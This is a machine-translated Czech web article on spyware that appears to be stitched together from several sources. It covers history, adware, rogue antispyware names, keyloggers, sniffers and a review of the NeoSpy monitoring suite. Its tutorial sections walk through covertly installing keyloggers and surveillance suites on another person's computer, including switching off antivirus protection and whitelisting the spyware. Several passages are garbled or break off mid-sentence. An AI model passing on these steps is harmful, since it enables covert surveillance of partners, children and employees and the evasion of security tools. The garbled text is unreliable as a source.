Co je spyware v počítači. Hodnocení spywaru

Spyware software

Spyware (spyware) - program, který je tajně nainstalován na počítači za účelem úplné nebo částečné kontroly provozu počítače a uživatele bez jeho souhlasu.

V současné době existuje mnoho definic a výkladů pojmu spyware. Anti-Spyware Coalition, která zahrnuje mnoho významných výrobců antispywarového a antivirového softwaru, jej definuje jako monitorovací software, nainstalován a používán bez řádného upozornění uživatele, jeho souhlasu a kontroly uživatelem, tedy neoprávněná instalace.

Spyware může provádět širokou škálu úkolů, jako například:

  • shromažďovat informace o zvycích používání internetu a nejčastěji navštěvovaných stránkách (sledovací program);
  • zapamatovat si stisknuté klávesy na klávesnici (škrabky na obrazovce) a následně odeslat informace tvůrci spywaru;
  • neoprávněné a dálkové ovládání počítače (software pro dálkové ovládání) - zadní vrátka, botnety, droneware;
  • nainstalovat další programy do počítače uživatele;
  • být použit pro neoprávněnou analýzu stavu bezpečnostních systémů (software pro analýzu zabezpečení) - skenery portů a zranitelností a prolomení hesel;
  • změna parametrů operačního systému (software modifikující systém) - rootkity, ovládání interceptorů (hijackerů) atd. - což má za následek snížení rychlosti připojení k internetu nebo ztrátu připojení jako takového, otevírání dalších domovských stránek nebo mazání určitých programů ;
  • přesměrování aktivity prohlížeče, což znamená slepou návštěvu webových stránek s rizikem virů.

Legitimní použití „potenciálně nežádoucích technologií“

Historie a vývoj

Do roku 2006 se Spyware stal jednou z převládajících bezpečnostních hrozeb. počítačové systémy pomocí systému Windows. Počítače, které používají Internet Explorer jako svůj primární prohlížeč, nejsou částečně zranitelné, protože internet Explorer nejpoužívanější, ale protože jeho těsná integrace s Windows umožňuje spywaru získat přístup ke klíčovým uzlům OS.

Před vydáním Internet Exploreru 7 prohlížeč automaticky zobrazil instalační okno pro jakoukoli komponentu ActiveX, kterou chtěl web nainstalovat. Kombinace naivní neznalosti spywaru uživatele a předpokladu Internet Exploreru, že všechny komponenty ActiveX jsou neškodné, přispěla k masovému rozšíření spywaru. Mnoho spywarových komponent také využívá chyby v

Spyware, adware a sledovače

Termín „adware“ často označuje jakýkoli program, který zobrazuje reklamy s nebo bez souhlasu uživatele. Některé, jako např Eudore, zasílat klientovi reklamu jako alternativu k placení registračních účtů. Takové programy jsou klasifikovány jako adware ve smyslu softwaru podporovaného reklamou, ale ne jako spyware. Adware nepůsobí skrytě ani uživatele neuvádí v omyl, pouze uživateli nabízí doplňkové služby.

Mnoho adware je spyware z jiných důvodů: zobrazují reklamy na úvodní obrazovce na základě výsledků špehování ve vašem počítači. Příklady: Software Gator od společnosti Claria Corporation and Přesná reklama od BargainBuddy. Webové stránky, které navštívíte, mohou být nastaveny Gator na klientských počítačích skrytým způsobem, čímž se příjmy odvádějí ze zobrazování více vyskakovacích oken na stránky instalačního programu a společnosti Claria Corporation.

Jiné chování spywaru, jako je hlášení o webech navštívených uživatelem, se děje na pozadí. Data slouží k cílenému reklamnímu efektu.

Rozšířené používání spywaru vrhá podezření na další programy, které sledují návštěvy webových stránek pro účely výzkumu a statistik. Někteří recenzenti popisují Alexa Toolbar, plugin Ad-Aware, potvrzují to.

Spyware a adware jsou podobné virům v tom, že jsou svou povahou škodlivé.

Stejně tak programy dodávané s bezplatné programy s reklamní podporou jsou Spyware (při odinstalaci se odstraní pouze nadřazený program), uživatelé si je však dobrovolně stahují. To představuje dilema pro tvůrce antispywaru, jejichž nástroje pro odstranění mohou trvale deaktivovat požadované programy. Například nedávné výsledky testů ukázaly, že kompletní program KdyžUSave skenery ignorovány), protože je součástí oblíbeného klienta eDonkey. Aby se tento problém vyřešil, Anti-Spyware Coalition pracuje na vybudování konsenzu v rámci antispywarového průmyslu o tom, co představuje přijatelné chování programu.

Spyware, viry a červi

telefonní podvod

Tvůrci spywaru se mohou dopustit podvodu na telefonní linky pomocí programů pro vytáčení. Vytáčení může přeinstalovat modem pro vytáčení na drahé telefonní čísla místo obvyklého ISP. Spojení s těmito nedůvěryhodnými čísly podléhá mezinárodním nebo mezikontinentálním sazbám, což má za následek přehnaně vysoké telefonní účty. Dialer není účinný na počítačích bez modemu nebo na počítačích, které nejsou připojeny k telefonní lince.

Digitální ochrana autorských práv

Některé technologie ochrany proti kopírování jsou spyware. V roce 2005 bylo zjištěno, že Sony BMG Music Entertainment používá ve své technologii ochrany proti kopírování XCP rootkity. Stejně jako spyware byly nejen obtížně detekovatelné a odinstalovatelné, ale byly tak špatně napsané, že většina pokusů o jejich odstranění způsobila poruchu počítače.

Počínaje 25. dubnem 2006 byla přihláška datována Oznámení Windows Genuine Advantage(počítače jako „kritická aktualizace zabezpečení“. Hlavním účelem této záměrně neodinstalovatelné aplikace bylo potvrdit, že kopii Windows koupil a nainstaloval legálně na stroj, nainstaloval také program, který byl obviněn z každodenního „volání domů“ jako spyware. Tuto aplikaci lze odinstalovat pomocí Odebrat WGA.

Osobní vztahy

Spyware se používá k tajnému sledování elektronické aktivity intimních partnerů, obvykle k odhalení nevěry. Alespoň jeden ze softwarových balíků Milenci, byl speciálně navržen pro takové účely.

Spyware a soubory cookie

Některé vzorky

Tyto běžné spyware vykazují různé chování. Všimněte si, že stejně jako u virů, i u Spywaru dali výzkumníci jména, která se mohou lišit od těch, se kterými přišli jejich tvůrci. Spyware lze seskupit do rodin na základě nikoli společného kódu, ale podobného chování. Například řada distribuovaných programů Společnost Claria Corporation, souhrnně známý jako Gator. Podobně programy, které se často instalují společně, lze popsat jako součást jednoho balíčku spywaru, i když fungují samostatně.

  • webové stránky, včetně coolwebsearch.com. Poskytuje vyskakovací reklamy, přepisuje výsledky vyhledávání a upravuje infikované hostitelské soubory pro přesměrování webových stránek.
  • Hunt Bar také WinTools nebo Adware.Websearch. Instaluje se společně se stahováním ActiveX z partnerských stránek nebo prostřednictvím vyskakovacích oken vydaných jiným spywarem (příklad toho, jak jeden spyware může nainstalovat ještě více spywaru). Tyto programy přidávají do aplikace Internet Explorer panely nástrojů, sledují vaše zvyky při procházení, přesměrovávají přidružené odkazy a zobrazují vyskakovací reklamy.
  • Movieland, popř Moviepass.tv nebo popcorn.net je služba pro stahování videa, která byla předmětem tisíců stížností kvůli jejímu neustálému zobrazování otravných vyskakovacích oken a žádostí o platbu. Americká Federální obchodní komise shromáždila spisy týkající se stížností proti společnosti Movieland a 11 dalším obžalovaným obviněným z vytvoření národního schématu pro použití podvodu a nátlaku k vybírání plateb od zákazníků. Obžaloba tvrdila, že program „opakovaně otevírá nepřiměřená okna s reklamami, která nelze zavřít nebo minimalizovat, doprovázená přehráváním hudby po dobu asi 1 minuty, a vyžaduje platbu ve výši 29,95 USD za zastavení zobrazování vyskakovacích oken, což vyžaduje také zákazníky, kteří se zaregistrovali třídenní bezplatná zkušební verze, která však nebyla zrušena před vypršením zkušební doby, byla zaplacena stejně.“
  • Zango (dříve 180 řešení). Poskytuje inzerentům podrobné informace o webových stránkách navštívených uživatelem. Také se mění webové stránky affiliate inzerentů, které zase poskytují příležitost pro nepoctivé příjmy 180 řešení. Otevírá vyskakovací okna, která překrývají webové stránky konkurenčních společností.
  • Trojan.Zlob nebo jednoduše Zlob. Stáhne se do počítače pomocí kodeku ActiveX a na server hlásí informace, jako je historie vyhledávání, navštívené webové stránky a dokonce i stisknuté klávesy. Nedávno bylo zjištěno, že Zlob je schopen znehodnotit nastavení routerů.

Na rozdíl od tvrzení spotřebitelů výrobci spywaru tvrdí, že uživatelé ve skutečnosti s instalací souhlasí. Spyware dodávaný s distribucí lze použít v obchodním jazyce uživatelská smlouva EULA. Mnozí ze zvyku ignorují čtení a pochopení významu tohoto dokumentu a jednoduše kliknou na tlačítko „Souhlasím“. K dnešnímu dni soudní systém nerozhodl, zda jsou inzerenti odpovědní za spyware, který zobrazuje jejich reklamy. V mnoha případech společnosti, jejichž produkty se objevují v reklamách iniciovaných Spywarem, nejednají přímo s výrobcem Spywaru. Spíše uzavírají smlouvu s reklamní agenturou, která zase uzavírá smlouvu s třetí stranou, která je placena za počet zásahů. Některé přední společnosti, jako je Dell Computer,

Metody léčby a prevence

Pokud se hrozba ze spywaru stane více než rušivou, existuje řada metod, jak se s ní vypořádat. To zahrnuje programy určené k odstranění nebo zablokování zavádění spywaru, stejně jako různé tipy pro uživatele, jak snížit pravděpodobnost, že se spyware dostane do systému.

Spyware však zůstává nákladným problémem. Pokud OS infikuje významný počet spywarových prvků, jediným řešením je uložit soubory uživatelských dat a kompletně přeinstalovat OS.

Antispywarové programy

Programy jako Windows XP a Windows Server 2003. V roce 2006 společnost Microsoft přejmenovala beta verzi na Windows Defender, který je k dispozici ke stažení zdarma (pro registrované uživatele) od října 2006 a je součástí standardního nástroje ve Windows Vista.

Některé další antispywarové produkty:

  • SPYWAREfighter
  • Spybot – Search & Destroy
  • Lovec špionů
  • Spy Sweeper
  • Spyware Terminator
  • SUPERantiSpyware
  • Monitor bezpečnosti systému
  • VundoFix
  • Nástroj pro odstranění škodlivého softwaru systému Windows
  • XOFTspy Přenosný anti-Spyware

Mnoho antivirových firem (např. McAfee a Sophos) se později rozhodlo přidat do stávajících antivirových produktů funkcionalitu proti spywaru. Mnozí brzy vyjádřili neochotu přidat antispyware a citovali žaloby autorů Spywaru proti majitelům webových stránek a programů, kteří jejich produkt popisovali jako Spyware. Nicméně nejnovější verze antivirové produkty pro domácnosti a firmy od těchto předních společností stále obsahují funkci antispywaru, i když přístup je odlišný od přístupu virů: například . Antivirové přístupové skenery fungují podobným způsobem.

  • Detekce a odstranění spywaru, kterému se již podařilo proniknout do systému. Tento typ antispywaru je mnohem jednodušší a populárnější. V takových programech můžete nastavit plán skenování a čištění. Registr je skenován složka Windows a nainstalované programy, po kterých se zobrazí zpráva o nalezených hrozbách, která vám umožní vybrat si, co chcete odstranit.

    • Rané verze antispywaru se zaměřovaly především na jejich vyhledávání a odstraňování. SpywareBlaster od Javacool Software byl jedním z prvních, který nabízel ochranu v reálném čase a blokoval instalaci spywaru založeného na ActiveX a dalšího spywaru.

    Podobně jako antivirové programy i antispyware vyžaduje pravidelnou aktualizaci databáze. Jakmile jsou uvolňovány nové vzorky spywaru, vývojáři antispywaru je detekují a vyhodnocují a vytvářejí signatury, které programu umožňují najít a odstranit hrozbu. Antispyware bez zdroje pravidelných aktualizací je tedy málo užitečný. Někteří výrobci poskytují službu aktualizace po registraci, jiní umožňují aktualizaci zdarma. Aktualizace lze instalovat automaticky podle plánu, před skenováním nebo ručně.

    Pokud Spyware nebyl zablokován a podařilo se jej nainstalovat, bude odolávat pokusům o zastavení spouštění nebo odinstalaci. Některé spywary fungují ve dvojicích: když antispywarový skener nebo uživatel přeruší jeden běžící proces, druhý oživí zabíjený program. Stejně tak některý Spyware detekuje pokus o odstranění klíčů registru a okamžitě je znovu přidá. Obvykle se spustí infikovaný operační systém bezpečný režim zvyšuje pravděpodobnost, že antispyware odstraní tvrdohlavý spyware.

    Spyware nové generace ( dobrý příklad je Look2Me z NicTechNetworks) je spuštěn a skrývá se mezi kritickými systémové procesy a běží i v nouzovém režimu. Pokud neexistuje žádný proces, který lze bezbolestně přerušit, je mnohem obtížnější odhalit a odstranit spyware. Někdy dokonce na disku nezanechají žádnou známku existence.

    Nejnovější Spyware má specifická protiopatření proti známým antivirové programy a může jim zabránit ve spuštění nebo instalaci nebo dokonce odinstalaci. Příkladem spywaru využívajícího všechny tři metody je Gromozon. Aby zůstal neviditelný, používá proměnný datový tok. Vestavěný rootkit jej skryje i před skenery s proměnným vláknem a aktivně brání spuštění známých skenerů rootkitů.

    Falešný antispyware

    Škodliví programátoři uvolňují značné množství falešného anti-spywaru a rozšířená vyskakovací okna vás upozorňují, „jak jsou vaše počítače infikované“, navrhují, abyste si koupili produkty, které spyware odstraňují (které neodstraňují a v nejhorším případě mohou přidat ještě více spywaru). Tyto druhy programů (např. Titanový štít), často nainstalujte trojského koně, abyste si stáhli zkušební verzi.

    Hlavním cílem výrobců těchto produktů je prodat svůj produkt. Může se objevit opakovaně dialogová okna ze systému Windows se zprávou: "VAROVÁNÍ! Váš počítač je napaden spywarem! Kupte... (název programu), abyste jej odstranili!“ Obvykle kliknutím na tlačítko OK v dialogovém okně přesměrujete prohlížeč na porno stránku. Někdy i lisování horní tlačítko X pro zavření okna může mít stejný účinek nebo dokonce aktivovat instalaci. Stisknutím Alt+F4 lze tento trik obejít. Některé programy jako SpyAxe, automaticky stáhnout zkušební verzi bez jakéhokoli zásahu uživatele.

    Často se objevují zprávy o výsledcích „skenování“ a počtu nalezených hrozeb, které by měly uživatele přesvědčit o nutnosti instalace tohoto programu.

    Téměř všechny známé anti-spyware detekují přítomnost falešných programů, které jsou již nainstalovány ve vašem systému. Ty, které jsou instalovány pomocí trojského koně, jsou mnohé anti-spyware schopny „zdržet“ ještě před pokusem o zavedení. Odstranění agresivního falešného antispywaru nové generace však často vyžaduje použití nástrojů, jako je HijackThis v kombinaci s technikou ručního odstranění, protože může nějakou dobu trvat, než se výrobci antispywaru dozvědí o nových vznikajících hrozbách a zautomatizují proces jejich detekce a odstranění. Použití HijackThis bez pomoci počítačového specialisty však může vést k náhodnému smazání skutečně nutného Komponenty Windows, což může vést k selhání systému jako celku. Proto se doporučuje uchýlit se k pomoci konzultantů na tematických fórech.

    Šíření falešných nebo klamavých antivirových produktů vyvolalo vážné obavy. Tyto produkty se často tváří jako antispyware, antivirus nebo čističe registru a někdy zobrazují vyskakovací okna s žádostí o instalaci.

    Někteří významní představitelé:

    • Pokročilý čistič
    • AlfaCleaner
    • AntiSpyCheck 2.1
    • AntiSpyStorm
    • AntiSpywareBot
    • AntiSpyware Expert
    • AntiSpyware Master
    • Antiverminy
    • AntiVirGear
    • Antivirus Gold
    • AntiVirusXPPro2009
    • Awola 6.0
    • Statečný Sentry
    • Nejprodávanější antivirus
    • Čistič
    • ContraVirus
    • Diskový rytíř
    • Doctor Antivirus
    • DriveCleaner
    • EasySpywareCleaner
    • chybová
    • IE Antivirus
    • IEDefender
    • InfeStop
    • MacSweeper
    • MalwareAlarm
    • Malware Bell 3.2
    • MalwareCore
    • MalCrush 3.7
    • Odstraňovač spywaru PAL
    • PC Antispy
    • PC-Antispyware
    • PC Clean Pro
    • PCPrivacytool
    • PCSecureSystem
    • Perfektní čistič
    • Past na škůdce
    • PSGuard
    • SecurePCCleaner
    • Panel nástrojů zabezpečení 7.1
    • SmitFraud
    • Spy pryč
    • SpyAxe
    • SpyCrush
    • Spydawn
    • Spy Remover
    • Špionážní stráž
    • SpyHeal
    • spylocked
    • SpyMarshal
    • Spy Rid
    • SpySheriff
    • Spy Shredder
    • SpySpotter
    • Špionážní stěrač
    • Spyware Cleaner
    • Spyware Quake
    • Spyware Stormer
    • SpywareStrike
    • SystemDoctor
    • Systém Live Protect
    • Důvěryhodný antivirus
    • UltimateCleaner
    • VirusHeat
    • Virus Locker
    • VirusProtectPro
    • VirusRanger
    • Vista antivirus 2008
    • WinAntiVirus Pro 2006
    • winfixer
    • WinSpywareProtect
    • WorldAntiSpy
    • XP Antivirus
    • Zinaps 2008

    Někdy je důležité vědět, co se děje s počítačem ve vaší nepřítomnosti. Kdo a co na něm dělá, které weby a programy jsou zahrnuty. To vše může hlásit speciální spyware.

    Špehovat kohokoli není dobré, přinejmenším. Nebo dokonce trestněprávně postižitelné (porušení práva na mlčenlivost a vše ostatní) ... Někdy však neuškodí vědět, co například dělá vaše dítě u počítače ve vaší nepřítomnosti nebo jací jsou zaměstnanci vaší organizace dělat, když není šéf. Možná vás sledují?

    Počítač a mobilní zařízení byli dlouho vystaveni nebezpečí nejrůznějších virů. Existuje však třída softwaru, který, i když není škodlivý, může vykonávat stejné funkce jako například trojské koně – vést protokol o spuštění aplikací v systému, zaznamenávat všechny stisknuté klávesy na klávesnici, pravidelně pořizovat snímky obrazovky a poté odeslat všechny shromážděné informace tomu, kdo nainstaloval a nakonfiguroval sledování uživatelů.

    Jak jste pochopili, dnes budeme hovořit o spywaru, jejich práci a metodách detekce.

    Rozdíly od virů

    V oblasti antivirových řešení je třída spywaru známá jako „spyware“. V zásadě některé z aplikací, o kterých bude řeč níže, jsou antiviry vnímány jako škodlivé, ve skutečnosti tomu tak není.

    Jaký je rozdíl mezi skutečným spywarem a softwarem pro sledování počítače? Hlavní rozdíl je zde v rozsahu a způsobu provozu. Spyware viry se instalují do systému bez vědomí uživatele a mohou sloužit jako zdroj dalších hrozeb (např. krádež a poškození dat).

    Spyware programy pro monitorování počítače si uživatel instaluje sám, aby zjistil, co na PC dělá jiný uživatel. Sám uživatel přitom může vědět, že jsou sledováni (v některých institucích se tak děje např. za účelem evidence pracovní doby zaměstnanců).

    Z hlediska principů fungování se však spyware ve skutečnosti neliší od všemožných trojských koní, keyloggerů nebo backdoorů... Můžeme je tedy považovat za jakési „defektové viry“, které přešly na „světlé“ straně“ a nepoužívají se tolik pro krádež informací z PC, jak moc řídit jeho provoz.

    Mimochodem, na Západě je praxe implementace sledovacího softwaru na počítačích uživatelů firemní sítě a na domácích PC je zcela běžné. Pro takové programy existuje dokonce i samostatný název – „sledovací software“ („sledovací programy“), který je umožňuje, alespoň nominálně, oddělit od škodlivého spywaru.

    Keyloggery

    Nejrozšířenějším a do jisté míry i nebezpečným typem spywaru jsou keyloggery (z anglického „key“ – „tlačítko“ a „logger“ – „registrátor“). Navíc tyto programy mohou být buď nezávislé viry, které jsou zavedeny do systému, nebo speciálně nainstalované sledovací nástroje. Ve skutečnosti mezi nimi není žádný rozdíl.

    Keyloggery jsou navrženy tak, aby registrovaly všechna stisknutá tlačítka na klávesnici (někdy i myši) a ukládaly data do souboru. V závislosti na tom, jak každý konkrétní keylogger funguje, může být soubor jednoduše uložen na místní pevný disk nebo pravidelně odesílán někomu, kdo je špehuje.

    Aniž bychom tedy cokoli tušili, můžeme všechna naše hesla „předat“ třetím stranám, které je mohou použít k jakémukoli účelu. Útočník se může například nabourat do našeho účtu, změnit přístupová hesla a/nebo je někomu přeprodat...

    Naštěstí většina keyloggerů je rychle detekována většinou antivirů, protože provádějí podezřelé zachycení dat. Pokud však keylogger nainstaloval administrátor, pak s největší pravděpodobností bude zařazen do výjimek a nebude detekován...

    Ukázkovým příkladem bezplatného keyloggeru je SC-KeyLog :

    Tento keylogger, bohužel, je detekován antivirem ve fázi stahování. Pokud se tedy rozhodnete jej nainstalovat, dočasně vypněte ochranu, dokud to neuděláte potřebné soubory na "bílou listinu":

    • spustitelný soubor programy (výchozí: C:\Program Files\Soft-Central\SC-KeyLog\SC-KeyLog2.exe);
    • spustitelný soubor modulu sledování, který si vytvoříte v určené složce;
    • knihovna (soubor DLL) pro skryté zpracování dat, jejíž název jste také nastavili ve fázi nastavení a která je standardně uložena ve složce C:\Windows\System32\.

    Po instalaci budete přesměrováni do průvodce nastavením. Zde můžete nastavit e-mailovou adresu, na kterou se mají datové soubory zasílat, název a umístění pro ukládání výše zmíněných spustitelných modulů pro zachycení stisku kláves a také heslo potřebné k otevírání protokolů.

    Po provedení všech nastavení a zařazení souborů keyloggeru do seznamu důvěryhodných antivirových programů je vše připraveno k práci. Zde je příklad toho, co můžete vidět v souboru protokolu:

    Jak vidíte, SC-KeyLog zobrazuje názvy všech oken, se kterými uživatel pracuje, stisknuté tlačítko myši a vlastně i klávesnici (včetně servisních kláves). Zároveň je třeba poznamenat, že program neumí určit rozložení a zobrazuje všechny texty anglickými písmeny, které je ještě potřeba převést do čitelné ruskojazyčné podoby (například ).

    Funkce keyloggeru však mohou být skryté i v oblíbeném nespecializovaném softwaru. Živým příkladem toho je program pro změnu rozvržení textu Punto Switcher:

    Jeden z další funkce tohoto programu je "Deník", který se aktivuje ručně a ve skutečnosti je to skutečný keylogger, který zachycuje a pamatuje si všechna data zadaná z klávesnice. Text se přitom uloží v požadovaném rozložení a chybí už jen zachycení dění myši a mačkání speciálních kláves na klávesnici.

    Plus Přepínač Punto jako keylogger v tom, že není detekován antivirovým softwarem a je nainstalován na mnoha počítačích. V případě potřeby tedy můžete aktivovat sledování bez instalace jakéhokoli softwaru a dalších triků!

    Složití špióni

    Keylogger je dobrý, pokud potřebujete vědět pouze to, co uživatel zadává z klávesnice a jaké programy spouští. Tyto údaje však nemusí být dostatečné. Proto složitější softwarové komplexy pro komplexní špionáž. Takový spyware může zahrnovat:

    • keylogger;
    • zachycovač schránky;
    • špión obrazovky (pořizuje snímky obrazovky v určených intervalech);
    • spuštění programu a záznam činnosti;
    • systém záznamu zvuku a videa (pokud máte mikrofon nebo webovou kameru).

    Chcete-li lépe porozumět tomu, jak takové programy fungují, zvažte několik z nich bezplatná řešení tímto směrem. A první z nich bude bezplatný ruskojazyčný sledovací systém s názvem (pozor, antiviry a prohlížeče mohou blokovat přístup na stránku!):

    Mezi funkce programu patří:

    • zachycení úhozů na klávesnici;
    • pořizování snímků obrazovky (ve výchozím nastavení příliš často);
    • sledování spuštěné programy a dobu jejich činnosti;
    • sledování aktivity PC a uživatelského účtu.

    Bohužel, tento komplex pro sledování počítače je také detekován antiviry, proto jej musíte stáhnout a nainstalovat, musíte nejprve zakázat ochranu. Při instalaci budeme muset nastavit klávesovou zkratku pro vyvolání rozhraní programu a také heslo pro přístup ke shromážděným datům Application Data\Softex) a můžete ochranu aktivovat zpět.

    Softex Expert Home se spustí na pozadí a nikde nevytvoří zástupce ani aktivní ikony. Jeho práci bude možné zjistit pouze stisknutím kombinace horkých kláves, kterou jste zadali. V zobrazeném okně zadejte přístupové heslo, nejprve přejděte do sekce "Nastavení" na kartě "Snímky obrazovky" a zvyšte minimální interval mezi snímky a interval časovače (ve výchozím nastavení 2 a 10 sekund, resp. ).

    Pro sledování vašeho domácího počítače stačí takový špión. Kromě již zmíněných funkcí má Expert Home funkci vzdáleného prohlížení statistik, která vám umožňuje prohlížet protokoly přes internet. Chcete-li jej aktivovat, stačí kliknout na tlačítko připojit k serveru v sekci „Monitorování internetu“ a poté počkat, až bude na webu vývojářů vystaveno ID počítače a přístupové heslo:

    Stojí za to objasnit, že ve volném režimu provozu jsou statistiky uloženy na serveru pouze jeden den. Pokud chcete získat přístup na delší období, budete muset zaplatit od 250 (7 dní) do 1 000 (30 dní) rublů měsíčně.

    Další bezplatný komplexní program pro monitorování vašeho počítače je:

    Navzdory tomu, že se v názvu programu objevuje slovo „keylogger“, ve skutečnosti je v něm mnohem více možností. Mezi nimi:

    Samotný program není antivirem detekován, ale s aktivními heuristickými algoritmy je nalezena jeho "podezřelá" aktivita. Proto je nejlepší nainstalovat a nakonfigurovat jej s vypnutou ochranou.

    Ve fázi instalace není nutná žádná předběžná příprava (jediná věc, kterou potřebujete, je vybrat, pro koho se program instaluje a zda chcete zobrazit jeho ikonu na hlavním panelu). Po instalaci je však potřeba přidat složku programu (ve výchozím nastavení C:\WINDOWS\system32\Mpk) a její spustitelný soubor MPKView.exe do antivirových výjimek.

    Při prvním otevření okna nastavení. Zde můžeme změnit jazyk z angličtiny například na ukrajinštinu (z nějakého důvodu zde není ruština ...), nastavit naše klávesové zkratky programu (standardně ALT + CTRL + SHIFT + K) a heslo pro zadání ovládacím panelu.

    To je ve skutečnosti vše. Hlavní nevýhoda bezplatná verze programu jsou jeho omezení v některých aspektech sledování (například ne všechny programy jsou dostupné), stejně jako nemožnost posílat protokoly poštou nebo přes FTP. Zbytek je téměř vše v pořádku.

    Spyware existuje nejen pro stolní počítače, ale také pro mobilní platformy. Pokud chcete vědět, co vaše dítě dělá na tabletu nebo chytrém telefonu, můžete zkusit využít bezplatný multiplatformní sledovací systém KidLogger.

    Čichači

    Posledním a nejzákeřnějším prostředkem špionáže mohou být tzv. sniffery (z anglického „sniff“ – „vyčmuchat“). Tato třída programů se vědecky nazývá „analyzátory provozu“ a používá se k zachycení a analýze dat přenášených přes internet.

    Pomocí snifferu se může útočník připojit k aktuální webové relaci uživatele a použít ji pro vlastní účely jménem samotného uživatele falšováním datových paketů. Pokud máte velkou smůlu, pak vám pomocí snifferu mohou být „sebrat“ vaše přihlašovací jména a hesla pro vstup na jakékoli stránky, kde se nepoužívá šifrování provozu.

    Aby se stali obětí snifferu, ti, kteří používají jednu nebo druhou veřejnou síť pro přístup k internetu (například hotspot WiFi přístup). Také pod teoretickou hrozbou mohou být uživatelé podnikových sítí s příliš "podnikavým" správcem.

    Abyste zhruba pochopili, co je sniffer, navrhuji zvážit, v osobě zástupce této třídy programů, vývoj populárního týmu NirSoft:

    Tento sniffer je určen hlavně pro zachycování datových paketů na lokálním PC a slouží spíše pro dobré úmysly (např. ladění sítě). Jeho podstata je ale stejná jako u hackerských nástrojů.

    Osoba, která rozumí principům přenosu dat přes síťových protokolů a rozumí, jaký druh informací je přenášen v konkrétním paketu, může dešifrovat jeho obsah a v případě potřeby jej nahradit odesláním upraveného požadavku na server. Pokud připojení jde přes jednoduchý HTTP kanál bez šifrování, pak hacker uvidí vaše hesla přímo v okně sniffer, aniž by musel cokoliv dekódovat!

    Problém je umocněn skutečností, že dříve existovaly sniffery pouze pro stacionární operační systémy. Dnes například existuje mnoho snifferů pro Android. Útočník analyzující provoz tedy může být prakticky kdekoli (i u nedalekého stolu v kavárně s bezplatným Wi-Fi! Živým příkladem snifferu pro Android lze mobilní verze populární sniffer WireShark:

    Pomocí tohoto snifferu a programu pro analýzu protokolů Shark Reader může útočník zachytit data přímo ze smartphonu nebo tabletu připojeného k veřejnému přístupovému bodu.

    Špionážní protiopatření

    Tak jsme se dozvěděli, jak fungují hlavní typy spywaru. A vzniká legitimní otázka: "Jak se ale můžete chránit před sledováním sami?"... To je úkol z kategorie "obtížný, ale možný."

    Jak můžete vidět, téměř veškerý spyware je sledován antiviry. Prvním krokem je tedy aktualizace antivirové databáze bezpečnostní software, který jste nainstalovali. Kromě toho nezapomeňte otevřít „bílou listinu“ vašeho antivirového balíčku a zjistit, zda umožňuje fungování souborů s podezřelými názvy umístěnými v systémových složkách.

    Pokud používáte zmíněný Punto Switcher (nebo jeho obdoby), určitě si zkontrolujte, zda si „Deník“ někdo nezapnul bez vašeho vědomí.

    Pokud nastavení antiviru ani Punto Switcher nenalezly žádné podezřelé parametry, můžete se uchýlit ke skenování systému pomocí speciálních antivirových skenerů. Doporučuji používat programy, které jsem osobně testoval a.

    Kromě toho můžete zkontrolovat funkčnost tento moment procesy pomocí speciálních antivirových správců úloh. Příkladem toho může být bezplatný nástroj. Tento nástroj umožňuje nejen vidět názvy a adresy všech běžících procesů, ale také rychle posoudit míru jejich škodlivosti (i když je potenciální).

    Nejtěžší je čelit čichačům. Pokud nemůžete zcela odmítnout používání veřejných sítí, pak jediným typem ochrany může být použití stránek, které podporují šifrovaný protokol přenosu dat HTTPS (dnes jej má většina sociálních sítí). Pokud web nebo služba, kterou potřebujete, nepodporuje šifrování, můžete jako poslední možnost zorganizovat tunel pro bezpečný přenos dat pomocí VPN.

    závěry

    Jak vidíte, instalace a nastavení sledování jakéhokoli počítače není tak obtížné. Navíc to lze provést zcela zdarma pomocí malých programů. Pokud tedy používáte veřejné sítě nebo pracujete na PC, které používá více uživatelů, pak teoreticky existuje šance, že jste již sledováni.

    Přílišná nedbalost a důvěra vás může stát minimálně ztrátu hesel k účtům na sociálních sítích a v nejhorších případech například krádeže peněz z vašich elektronických účtů. Proto je důležité řídit se zásadou „důvěřuj, ale prověřuj“.

    Pokud se sami rozhodnete nainstalovat sledování na něčí počítač, měli byste na to uživatele upřímně upozornit. Jinak si v případě odhalení špionáže můžete vydělat spoustu problémů na hlavu :) Proto si před špehováním třikrát dobře rozmyslete!

    P.S. Tento článek je dovoleno volně kopírovat a citovat za předpokladu, že je uveden otevřený aktivní odkaz na zdroj a je zachováno autorství Ruslana Tertyshného.

    Jak můžete zjistit, co vaše dítě nebo zaměstnanec na počítači dělá? Jaké stránky navštěvuje, s kým komunikuje, co a komu píše?

    K tomu slouží spyware – speciální druh softwaru, který shromažďuje informace o všech svých akcích, které si uživatel nevšimne. Tento problém vyřeší špionážní program pro počítač.

    Spyware pro počítač by se neměl zaměňovat s trojským koněm: první je zcela legitimní a je instalován s vědomím správce, druhý se dostane do PC nelegálně a provádí skryté škodlivé aktivity.

    Ačkoli škodlivé programy mohou být také použity legitimními sledovacími programy.

    Špionážní aplikace si nejčastěji instalují vedoucí podniků a správci systému, aby mohli kontrolovat zaměstnance, rodiče, aby špehovali děti, žárlivé manžele atd. Přitom „oběť“ může vědět, že je sledována, ale nejčastěji to neví. .

    Přehled a srovnání pěti populárních spywarů

    NeoSpy

    NeoSpy je univerzální spyware pro klávesnici, obrazovku a akce uživatelů. NeoSpy funguje neviditelně a během instalace může skrýt svou přítomnost.

    Uživatel, který program instaluje, má možnost vybrat si jeden ze dvou režimů instalace – administrátorský a skrytý. V prvním režimu se program instaluje otevřeně – vytvoří zástupce na ploše a složku v adresáři Program Files, ve druhém je skrytý.

    Procesy programu se ve správci nezobrazují Úkoly systému Windows a správci úloh třetích stran.

    Funkčnost NeoSpy je poměrně široká a program lze použít jak jako domácí sledování, tak v kancelářích pro kontrolu zaměstnanců.

    Špionážní program je distribuován ve třech verzích pod sharewarovou licencí. Cena je 820-1990 rublů, ale může fungovat zdarma (i v stealth režimu) s omezeními při prohlížení přehledů.

    Co umí NeoSpy:

    • monitorovat klávesnici;
    • sledovat návštěvy stránek;
    • zobrazit obrazovku uživatele v reálném čase přes internet z jiného počítače nebo z tabletu;
    • pořizovat snímky obrazovky a ukládat obrázky z webové kamery;
    • řízení událostí systému (zapnutí, vypnutí, výpadek v počítači, připojení vyměnitelných médií);
    • zachytit obsah schránky;
    • Monitorujte používání internetových messengerů, nahrávejte hovory Skype;
    • zachytit data odeslaná pro tisk a zkopírovaná na externí média;
    • vést statistiku práce na počítači;
    • odeslat souřadnice notebooku (vypočítané přes Wi-Fi).

